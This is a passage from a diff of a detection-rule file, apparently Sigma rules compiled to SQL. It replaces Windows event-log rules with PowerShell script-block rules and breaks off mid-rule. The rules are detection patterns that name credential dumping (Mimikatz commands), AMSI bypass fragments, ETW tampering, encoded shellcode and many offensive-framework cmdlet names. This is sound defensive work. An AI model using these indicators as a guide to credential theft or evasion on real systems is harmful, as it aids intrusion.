"57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "status": "experimental", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "status": "test", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1197" + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.persistence", - "attack.t1554" + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", - "attack.t1106" + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE 